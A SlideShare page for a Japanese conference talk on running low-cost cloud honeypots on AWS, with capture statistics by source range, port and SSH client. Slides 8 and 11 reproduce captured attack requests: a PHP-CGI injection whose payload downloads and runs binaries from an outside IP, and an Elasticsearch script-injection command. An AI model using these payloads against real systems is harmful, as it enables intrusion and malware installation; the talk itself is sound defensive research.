Submit Search
Upload
クラウドハニーポットを運用しよう!
•
Download as PPTX, PDF
•
7 likes
•
3,196 views
Mizutani Masayoshi
Follow
コンピュータセキュリティシンポジウム2014 CSS2.0にて発表
Read less
Read more
Internet
Report
Share
Report
Share
1 of 12
Download now
Recommended
Fuzzing
Fuzzing
ashigirl ZareGoto
About Fuzzing
dofilewrite and vn_write
dofilewrite and vn_write
kusabanachi
NetBSD-6.0.1のコードリーディング。
Introduction to Initramfs - Initramfs-tools and Dracut
Introduction to Initramfs - Initramfs-tools and Dracut
Taisuke Yamada
Introduction to initramfs, and related tools.
リナックスに置ける様々なリモートエキスプロイト手法 by スクハー・リー
リナックスに置ける様々なリモートエキスプロイト手法 by スクハー・リー
CODE BLUE
セキュリティの強化された最新版の現在のLinuxOSの保護機能を迂回し、リモートからの攻撃を成功させる方法と対策について詳細に説明する。 近年のオペレーティングシステムにはエクスプロイトから保護する強化されたセキュリティ技術が多く使われています。 ASLRとNX (DEP)の2つはそうしたセキュリティを目的とした技術です。 しかしながら、これらの技術も高度なエクスプロイト技術を使う事で迂回する事が可能です。 昨今は、クライアント起点からの、サーバーのデーモン等を対象としたリモートからのコード実行を目的とするエキスプロイトは徐々に難しくなって来ています。 このような場合、多くは対象システムに関する情報の入手が難しくなって来ており、ゆえにコード実行も困難になってきています。 ターゲットとするプロセスのメモリー内レイアウトはリモートからのエクスプロイトに置いては必要不可欠な情報の一つと言えます。 最近ではメモリー漏洩を使ってメモリー内にどのようなライブラリーが読み込まれてるかを判断する 技術が登場しており、このような技術を使う事でASLRを迂回する事が可能になります。 これ以外にもリモートでターゲットとするプロセスのメモリーレイアウトを解析する方法があります。 この手法は対象となるリモートプロセスに対して有効なメモリーアドレスを探る方法です。 リナックス環境ではforkされた子プロセスは常に親プロセスにおいてランダム化されたメモリーレイアウトを常に継承しています。 よってサーバーのデーモンに対するクライアントのコネクションは同じメモリーレイアウトを共有します。 メモリーレイアウトのランダム化は親プロセスの起動時のみに行われ、クライアントから接続を処理するため子プロセスが発生した時には行われません。 子プロセスの継承により各接続から情報を集約することでターゲットとするリモートなプロセスのメモリーレイアウトの全体像を垣間見る事が可能になります。 ターゲットとするリモートプロセスに対して特定なアドレスが有効なメモリーアドレスかどうかを探り、得られた情報を集約する事でメモリー内のlibcライブラリーの場所が特定でき、更なるコード実行を行うエクスプロイトが可能になります。 このようなやり方をブルートフォース型攻撃とする意見もありますが、効率的なブルートフォース技術を使うことで多くの場合は最低限必要な試みを10回以下にする事が可能です。 本講演では、どのようにして特定のコードを使う事でメモリーレイアウトスペースにてターゲットがブロック状態になるのかの証明や、そうして得た情報を元にリモートからのエクスプロイト攻撃シナリオの中で安定したコードの実行について、リナックス環境に置けるリモートエクスプロイト開発によく使われる手法とともに発表します。 スクハー・リー- Seok-Ha Lee (wh1ant) 韓国のハッキングチームWiseguysのメンバー。子供の頃からソフトウェア開発を初め、徐々にセキュリティ研究に興味を持つようなる。2011年に就職、企業でリナックスカーネルのモジュールを使ったセキュリティソリューションに関するセキュリティ研究を行うようになる。複数の脆弱性を発見する傍ら、韓国内のカンファレンスにてセキュリティに関する発表を行
cdev_write and_comwrite
cdev_write and_comwrite
kusabanachi
NetBSD-6.0.1のソースコードリーディング。
APASEC 2013 - ROP/JIT を使わずに DEP/ASLR を回避する手法を見てみた。
APASEC 2013 - ROP/JIT を使わずに DEP/ASLR を回避する手法を見てみた。
Satoshi Mimura
CanSecWest 2013 で公開された資料を詳しく見てみた。
ttwrite
ttwrite
kusabanachi
NetBSD-6.0.1のソースコードリーディング.
initramfsについて
initramfsについて
Kazuhiro Nishiyama
Recommended
Fuzzing
Fuzzing
ashigirl ZareGoto
About Fuzzing
dofilewrite and vn_write
dofilewrite and vn_write
kusabanachi
NetBSD-6.0.1のコードリーディング。
Introduction to Initramfs - Initramfs-tools and Dracut
Introduction to Initramfs - Initramfs-tools and Dracut
Taisuke Yamada
Introduction to initramfs, and related tools.
リナックスに置ける様々なリモートエキスプロイト手法 by スクハー・リー
リナックスに置ける様々なリモートエキスプロイト手法 by スクハー・リー
CODE BLUE
セキュリティの強化された最新版の現在のLinuxOSの保護機能を迂回し、リモートからの攻撃を成功させる方法と対策について詳細に説明する。 近年のオペレーティングシステムにはエクスプロイトから保護する強化されたセキュリティ技術が多く使われています。 ASLRとNX (DEP)の2つはそうしたセキュリティを目的とした技術です。 しかしながら、これらの技術も高度なエクスプロイト技術を使う事で迂回する事が可能です。 昨今は、クライアント起点からの、サーバーのデーモン等を対象としたリモートからのコード実行を目的とするエキスプロイトは徐々に難しくなって来ています。 このような場合、多くは対象システムに関する情報の入手が難しくなって来ており、ゆえにコード実行も困難になってきています。 ターゲットとするプロセスのメモリー内レイアウトはリモートからのエクスプロイトに置いては必要不可欠な情報の一つと言えます。 最近ではメモリー漏洩を使ってメモリー内にどのようなライブラリーが読み込まれてるかを判断する 技術が登場しており、このような技術を使う事でASLRを迂回する事が可能になります。 これ以外にもリモートでターゲットとするプロセスのメモリーレイアウトを解析する方法があります。 この手法は対象となるリモートプロセスに対して有効なメモリーアドレスを探る方法です。 リナックス環境ではforkされた子プロセスは常に親プロセスにおいてランダム化されたメモリーレイアウトを常に継承しています。 よってサーバーのデーモンに対するクライアントのコネクションは同じメモリーレイアウトを共有します。 メモリーレイアウトのランダム化は親プロセスの起動時のみに行われ、クライアントから接続を処理するため子プロセスが発生した時には行われません。 子プロセスの継承により各接続から情報を集約することでターゲットとするリモートなプロセスのメモリーレイアウトの全体像を垣間見る事が可能になります。 ターゲットとするリモートプロセスに対して特定なアドレスが有効なメモリーアドレスかどうかを探り、得られた情報を集約する事でメモリー内のlibcライブラリーの場所が特定でき、更なるコード実行を行うエクスプロイトが可能になります。 このようなやり方をブルートフォース型攻撃とする意見もありますが、効率的なブルートフォース技術を使うことで多くの場合は最低限必要な試みを10回以下にする事が可能です。 本講演では、どのようにして特定のコードを使う事でメモリーレイアウトスペースにてターゲットがブロック状態になるのかの証明や、そうして得た情報を元にリモートからのエクスプロイト攻撃シナリオの中で安定したコードの実行について、リナックス環境に置けるリモートエクスプロイト開発によく使われる手法とともに発表します。 スクハー・リー- Seok-Ha Lee (wh1ant) 韓国のハッキングチームWiseguysのメンバー。子供の頃からソフトウェア開発を初め、徐々にセキュリティ研究に興味を持つようなる。2011年に就職、企業でリナックスカーネルのモジュールを使ったセキュリティソリューションに関するセキュリティ研究を行うようになる。複数の脆弱性を発見する傍ら、韓国内のカンファレンスにてセキュリティに関する発表を行
cdev_write and_comwrite
cdev_write and_comwrite
kusabanachi
NetBSD-6.0.1のソースコードリーディング。
APASEC 2013 - ROP/JIT を使わずに DEP/ASLR を回避する手法を見てみた。
APASEC 2013 - ROP/JIT を使わずに DEP/ASLR を回避する手法を見てみた。
Satoshi Mimura
CanSecWest 2013 で公開された資料を詳しく見てみた。
ttwrite
ttwrite
kusabanachi
NetBSD-6.0.1のソースコードリーディング.
initramfsについて
initramfsについて
Kazuhiro Nishiyama
Local php-100828 2
Local php-100828 2
Akio Ishida
第11回 LOCAL PHP部勉強会での発表資料です
trueコマンドに0以外の終了コードをはかせる方法
trueコマンドに0以外の終了コードをはかせる方法
mutz0623
第19回シェル芸勉強会でLTしました
SSRF基礎
SSRF基礎
Yu Iwama
SSRFについて社内で発表した際の資料です。 本資料は、作成者の勉強の一環として調査・検証したものになります。間違った解釈をしている場合は、ご指摘いただければ幸いです。
OPcache の最適化器の今
OPcache の最適化器の今
y-uti
PHP Conference 2017 での発表資料です。 PHP 7.1 から OPcache 内部の最適化器にデータフロー解析が実装され、より効率的なバイトコードが生成されるようになりました。過去と現在の OPcache の最適化器の処理について簡単に紹介したものです。
Memory sanitizer
Memory sanitizer
MITSUNARI Shigeo
PHP と SAPI と ZendEngine3 と
PHP と SAPI と ZendEngine3 と
do_aki
PHPerKaigi2018
シェル入門
シェル入門
ina job
非エンジニア向けコマンドラインの説明
Kernel fcache-bug
Kernel fcache-bug
MITSUNARI Shigeo
how to find a bug in kernel/fs about wrong page cache flush in resizing MD device.
Gofのデザインパターン stateパターン編
Gofのデザインパターン stateパターン編
Ayumu Itou
Android デバッグ小ネタ
Android デバッグ小ネタ
l_b__
第27回横浜Androidプラットフォーム部勉強会発表資料です
セキュリティ・キャンプアワード(2016)発表資料_ハニーポッターへの道
セキュリティ・キャンプアワード(2016)発表資料_ハニーポッターへの道
junk_coken
セキュリティ・キャンプフォーラム2016内セキュリティ・キャンプアワード発表資料
DNS問い合わせ結果の可視化
DNS問い合わせ結果の可視化
Mizutani Masayoshi
http://www.zusaar.com/event/3927003 2014.3.2 データ可視化 勉強会 のLTで話した資料です。
社内勉強会 20120518
社内勉強会 20120518
yoshinori matsumoto
社内勉強会で発表したやつ
低対話型サーバハニーポットの運用結果及び考察
低対話型サーバハニーポットの運用結果及び考察
Takaaki Hoyo
2年くらい前に某所で発表したハニーポットの運用の話です。 (結果は2014年のものなので少し古いです)
オワスプナイト20150115 dependency check
オワスプナイト20150115 dependency check
Hiroaki Kuramochi
オワスプナイト15th(2015/01/15)の講演資料です。
OWASP ASVS と Cheat Sheet シリーズ (日本語版) のご紹介 (OSC2016Hokkaido)
OWASP ASVS と Cheat Sheet シリーズ (日本語版) のご紹介 (OSC2016Hokkaido)
JPCERT Coordination Center
OSC2016Hokkaido での講演資料です. OWASP ASVS と Cheat Sheet シリーズの簡単な紹介をします.
Gstudy 公開用資料
Gstudy 公開用資料
Yusuke Yokozawa
第6回g-study LT資料
無線LANデンパゆんゆん観察
無線LANデンパゆんゆん観察
ozuma5119
2014/06/07の、 「Security Casual Talks 2014#2 @ すみだセキュリティ勉強会」 の発表資料です。補足などはブログに書いています: http://d.hatena.ne.jp/ozuma/20140607/1402122499
Owasp Project を使ってみた
Owasp Project を使ってみた
Akitsugu Ito
OWASP Night 19th で、サイボウズが活用する OWASP Project の成果物を紹介いたしました。
サーバ攻撃されてみた
サーバ攻撃されてみた
Kimie Furuya
ハニーポットという言葉も知らないで攻撃を待ち受けるサーバを立てたときの話をスライドにしました。 「言葉も知らないで」の言葉通り、ログを見る程度のことしかしてないです。 アップロードテストも兼ねています。
さくらのVPSに来る悪い人を観察する その2
さくらのVPSに来る悪い人を観察する その2
ozuma5119
さくらのVPSにアタックしてくる人たちを、ハニーポットなど使いながらその行動を観察した記録です。観察日記。 今回のネタは以下2つです。 *SSH honeypot(Kippo)を使った悪い人の行動観察、アンケート */cgi-bin/php (Apache Magica攻撃)の観察 なおこのスライドは、2013年12月7日のSecurity Casual Talks(すみだセキュリティ勉強会)での発表資料です。 http://ozuma.sakura.ne.jp/sumida/ またスライド中、動画は以下のURLで閲覧できます http://youtu.be/gp3SBjZNWHU
Javaのプログラムはどうやって動いているの? GC編
Javaのプログラムはどうやって動いているの? GC編
Yuichi Sakuraba
2015.04.24 JJUGナイトセミナ Javaのプログラムはどうやって動いているの? GC編
More Related Content
What's hot
Local php-100828 2
Local php-100828 2
Akio Ishida
第11回 LOCAL PHP部勉強会での発表資料です
trueコマンドに0以外の終了コードをはかせる方法
trueコマンドに0以外の終了コードをはかせる方法
mutz0623
第19回シェル芸勉強会でLTしました
SSRF基礎
SSRF基礎
Yu Iwama
SSRFについて社内で発表した際の資料です。 本資料は、作成者の勉強の一環として調査・検証したものになります。間違った解釈をしている場合は、ご指摘いただければ幸いです。
OPcache の最適化器の今
OPcache の最適化器の今
y-uti
PHP Conference 2017 での発表資料です。 PHP 7.1 から OPcache 内部の最適化器にデータフロー解析が実装され、より効率的なバイトコードが生成されるようになりました。過去と現在の OPcache の最適化器の処理について簡単に紹介したものです。
Memory sanitizer
Memory sanitizer
MITSUNARI Shigeo
PHP と SAPI と ZendEngine3 と
PHP と SAPI と ZendEngine3 と
do_aki
PHPerKaigi2018
シェル入門
シェル入門
ina job
非エンジニア向けコマンドラインの説明
Kernel fcache-bug
Kernel fcache-bug
MITSUNARI Shigeo
how to find a bug in kernel/fs about wrong page cache flush in resizing MD device.
Gofのデザインパターン stateパターン編
Gofのデザインパターン stateパターン編
Ayumu Itou
Android デバッグ小ネタ
Android デバッグ小ネタ
l_b__
第27回横浜Androidプラットフォーム部勉強会発表資料です
What's hot
(10)
Local php-100828 2
Local php-100828 2
trueコマンドに0以外の終了コードをはかせる方法
trueコマンドに0以外の終了コードをはかせる方法
SSRF基礎
SSRF基礎
OPcache の最適化器の今
OPcache の最適化器の今
Memory sanitizer
Memory sanitizer
PHP と SAPI と ZendEngine3 と
PHP と SAPI と ZendEngine3 と
シェル入門
シェル入門
Kernel fcache-bug
Kernel fcache-bug
Gofのデザインパターン stateパターン編
Gofのデザインパターン stateパターン編
Android デバッグ小ネタ
Android デバッグ小ネタ
Viewers also liked
セキュリティ・キャンプアワード(2016)発表資料_ハニーポッターへの道
セキュリティ・キャンプアワード(2016)発表資料_ハニーポッターへの道
junk_coken
セキュリティ・キャンプフォーラム2016内セキュリティ・キャンプアワード発表資料
DNS問い合わせ結果の可視化
DNS問い合わせ結果の可視化
Mizutani Masayoshi
http://www.zusaar.com/event/3927003 2014.3.2 データ可視化 勉強会 のLTで話した資料です。
社内勉強会 20120518
社内勉強会 20120518
yoshinori matsumoto
社内勉強会で発表したやつ
低対話型サーバハニーポットの運用結果及び考察
低対話型サーバハニーポットの運用結果及び考察
Takaaki Hoyo
2年くらい前に某所で発表したハニーポットの運用の話です。 (結果は2014年のものなので少し古いです)
オワスプナイト20150115 dependency check
オワスプナイト20150115 dependency check
Hiroaki Kuramochi
オワスプナイト15th(2015/01/15)の講演資料です。
OWASP ASVS と Cheat Sheet シリーズ (日本語版) のご紹介 (OSC2016Hokkaido)
OWASP ASVS と Cheat Sheet シリーズ (日本語版) のご紹介 (OSC2016Hokkaido)
JPCERT Coordination Center
OSC2016Hokkaido での講演資料です. OWASP ASVS と Cheat Sheet シリーズの簡単な紹介をします.
Gstudy 公開用資料
Gstudy 公開用資料
Yusuke Yokozawa
第6回g-study LT資料
無線LANデンパゆんゆん観察
無線LANデンパゆんゆん観察
ozuma5119
2014/06/07の、 「Security Casual Talks 2014#2 @ すみだセキュリティ勉強会」 の発表資料です。補足などはブログに書いています: http://d.hatena.ne.jp/ozuma/20140607/1402122499
Owasp Project を使ってみた
Owasp Project を使ってみた
Akitsugu Ito
OWASP Night 19th で、サイボウズが活用する OWASP Project の成果物を紹介いたしました。
サーバ攻撃されてみた
サーバ攻撃されてみた
Kimie Furuya
ハニーポットという言葉も知らないで攻撃を待ち受けるサーバを立てたときの話をスライドにしました。 「言葉も知らないで」の言葉通り、ログを見る程度のことしかしてないです。 アップロードテストも兼ねています。
さくらのVPSに来る悪い人を観察する その2
さくらのVPSに来る悪い人を観察する その2
ozuma5119
さくらのVPSにアタックしてくる人たちを、ハニーポットなど使いながらその行動を観察した記録です。観察日記。 今回のネタは以下2つです。 *SSH honeypot(Kippo)を使った悪い人の行動観察、アンケート */cgi-bin/php (Apache Magica攻撃)の観察 なおこのスライドは、2013年12月7日のSecurity Casual Talks(すみだセキュリティ勉強会)での発表資料です。 http://ozuma.sakura.ne.jp/sumida/ またスライド中、動画は以下のURLで閲覧できます http://youtu.be/gp3SBjZNWHU
Javaのプログラムはどうやって動いているの? GC編
Javaのプログラムはどうやって動いているの? GC編
Yuichi Sakuraba
2015.04.24 JJUGナイトセミナ Javaのプログラムはどうやって動いているの? GC編
3分でサーバオペレーションコマンドを作る技術
3分でサーバオペレーションコマンドを作る技術
Kei IWASAKI
#pyconjp 2015 の LTで発表した際に利用した資料です https://pycon.jp/2015/ja/schedule/presentation/93/
ステートフル型のトラフィック監視ツールとDNSの監視例
ステートフル型のトラフィック監視ツールとDNSの監視例
Mizutani Masayoshi
第22回「ネットワーク パケットを読む会(仮)」にて発表した資料です
Viewers also liked
(14)
セキュリティ・キャンプアワード(2016)発表資料_ハニーポッターへの道
セキュリティ・キャンプアワード(2016)発表資料_ハニーポッターへの道
DNS問い合わせ結果の可視化
DNS問い合わせ結果の可視化
社内勉強会 20120518
社内勉強会 20120518
低対話型サーバハニーポットの運用結果及び考察
低対話型サーバハニーポットの運用結果及び考察
オワスプナイト20150115 dependency check
オワスプナイト20150115 dependency check
OWASP ASVS と Cheat Sheet シリーズ (日本語版) のご紹介 (OSC2016Hokkaido)
OWASP ASVS と Cheat Sheet シリーズ (日本語版) のご紹介 (OSC2016Hokkaido)
Gstudy 公開用資料
Gstudy 公開用資料
無線LANデンパゆんゆん観察
無線LANデンパゆんゆん観察
Owasp Project を使ってみた
Owasp Project を使ってみた
サーバ攻撃されてみた
サーバ攻撃されてみた
さくらのVPSに来る悪い人を観察する その2
さくらのVPSに来る悪い人を観察する その2
Javaのプログラムはどうやって動いているの? GC編
Javaのプログラムはどうやって動いているの? GC編
3分でサーバオペレーションコマンドを作る技術
3分でサーバオペレーションコマンドを作る技術
ステートフル型のトラフィック監視ツールとDNSの監視例
ステートフル型のトラフィック監視ツールとDNSの監視例
クラウドハニーポットを運用しよう!
1.
クラウドハニーポットを運用しよう! +
水谷正慶(@m_mizutani)
2.
Honeypot ハニーポット(英語: Honeypot)
は、コンピュータセキュリティ 用語としては、不正アクセスを受けることに価値を持つシステム のことを指す。元来は「蜜(の詰まった)壷」の意味で、何らか の有益そうな情報や資源がありそうな場所を用意して、それにつ られた者を観察したり、肝心な部分で被害を出さないために目を 逸らせたり、コンピュータ・フォレンジックスを行うための証拠 を集めたりする、一種の囮手法に使われる。手法そのものをハ ニーポットと呼ぶこともある。ハニーポットは囮のために設置す るので正規の通信が発生しないという特徴がある。これは、記録 に残るアクセスはすべて不正アクセスとなるので、誤検知を減ら し検知洩れを無くすことができる。ハニーポットの目的として、 ウイルスやワームの検体の入手、不正アクセスを行うクラッカー をおびき寄せ重要なシステムから攻撃を逸らしたり、記録された 操作ログ・通信ログなどから不正アクセスの手法と傾向の調査を 行うなど挙げられる。 http://www.infiltrated.net/voipabuse/honeypot/
3.
なんでクラウド? IPアドレスがばれるとゴミ データが流れてくる&寄り
付かれなくなる可能性が インスタンス上げたり消した りができるので、変更が容易 ハニーポット専用にマシン やネットワークを用意する のが大変 APIで増やせる。 金の力でスケールアウトする 今どきDbDがメジャーで ISPとかだと直接攻撃コー ドとか送ってこないのでは クラウドサービスだとサー バとして動いているマシン があるのが前提なので無差 別攻撃してくる
4.
ひと月あたりのお値段(AWSの場合) t2.microインスタンス:$0.02/h
追加Elastic IPアドレス:$0.005/h データ転送:$0.010/GB (ほぼなし) $0.025/h * 24 * 30 + α ≒ $18/月
5.
構成 AWS Honeypot
instnace 1 NIC1 NIC2 Honeypot instnace 2 NIC1 NIC2 Honeypot instnace 3 NIC1 NIC2 制御用 ハニーポット用 制御用 ハニーポット用 制御用 ハニーポット用 The Internet 54.64.a.a 54.64.b.b 54.64.c.c 54.64.d.d 54.64.e.e 54.64.f.f
6.
Honeypot Software
超低インタラクション型ハニーポット Lurker (https://github.com/m-mizutani/lurker) TCPのSYNに対してSYN-ACKのみ返す 利点 IPアドレスに対するスケーラビリティ 多数のポートを同時に監視できるシンプルな実装 攻撃側Lurker (Honeypot) SYN SYN+ACK ACK Data
7.
Experience Summary
2014年9月28日〜10月18日に3台で監視 攻撃してきたホスト:2001 IPアドレス ユニークな送信元IPアドレスレンジ/16 ranking 3位61.153.0.0/16 (CN)、39 IPアドレス 2位222.186.0.0/16 (CN)、39 IPアドレス 1位122.225.0.0/16 (CN)、63 IPアドレス アクセスポート番号ranking 5000 4000 3000 2000 1000 0 443 3389 22 1433 3128 135 80 445 その他
8.
Port 80へのアクセス例 POST
/cgi-bin/ php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F %6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+ %2D%64+%64%69%73%61%62%6C%65%5F%66 %75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D %64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6 4+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2%72%65%64%69%72 %65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 Host: 54.64.66.18 User-Agent: Mozilla/5.0 (compatible; Zollard; Linux) Content-Type: application/x-www-form-urlencoded Content-Length: 1809 Connection: close <?php echo "Zollard"; $disablefunc = @ini_get("disable_functions"); (中略) myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://1.54.234.131:58455/armeabi;chmod +x /tmp/armeabi"); myshellexec("rm -rf /tmp/arm;wget -P /tmp http://1.54.234.131:58455/arm;chmod +x /tmp/arm"); myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://1.54.234.131:みせら58455/れないppc;よchmod ! +x /tmp/ppc"); myshellexec("rm -rf /tmp/mips;wget -P /tmp http://1.54.234.131:58455/mips;chmod +x /tmp/mips"); myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://1.54.234.131:58455/mipsel;chmod +x /tmp/mipsel"); myshellexec("rm -rf /tmp/x86;wget -P /tmp http://1.54.234.131:58455/x86;chmod +x /tmp/x86"); myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://1.54.234.131:58455/nodes;chmod +x /tmp/nodes"); myshellexec("rm -rf /tmp/sig;wget -P /tmp http://1.54.234.131:58455/sig;chmod +x /tmp/sig"); myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;"); ?> みせられないよ! HTTPのリクエストとか が視える!
9.
Port 22へのアクセス後に送信されたデータの種別 0
20 40 60 80 100 120 140 160 stats SSH-2.0-libssh2_1.4.3 PHP SSH-2.0-libssh2_1.4.3 SSH-2.0-libssh2_1.4.2 SSH-2.0-libssh2_1.4.1 SSH-2.0-libssh2_1.4.0 SSH-2.0-libssh2_1.2.8 PHP SSH-2.0-PuTTY_Local:_May_14_2009_21:12:18 SSH-2.0-JSCH-0.1.51 SSH-2.0-JSCH-0.1.44 GET / HTTP/1.0 (none) SSHのクライアント名がみえる! (意外に堂々とlibsshが使われている)
10.
”^SSH-”が含まれるアクセスのポート 0 500
1000 1500 2000 2500 3000 60022 50022 22345 22222 22000 20022 10022 9022 8122 8023 8022 7022 5022 3022 2222 2202 2200 2022 1234 1022 22 ポート22以外にもSSHでつなぎにきて いることがわかる
11.
その他 To Port
9200 GET /_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script _fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;import%20java.io.*;String%20str%20=%20%22 %22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().ex ec(%22chmod%200777%20%2ftmp%2f%2a%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringB uilder();while((str=br.readLine())!=null){sb.append(str);sb.append(%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}} HTTP/1.1 User-Agent: InetURL:/1.0 ポート80以外にもHTTPリクエストが Host: 54.64.66.18:9200 Cache-Control: no-cache 投げ込まれていることがわかる To Port 21320 GET http://headers.nixipdb.com/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 Host: headers.nixipdb.com Accept-Encoding: deflate, gzip Proxy-Connection: Keep-Alive Accept-Language: en-gb,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Pragma: no-cache Cache-Control: no-cache
12.
ご静聴ありがとうございました
Download now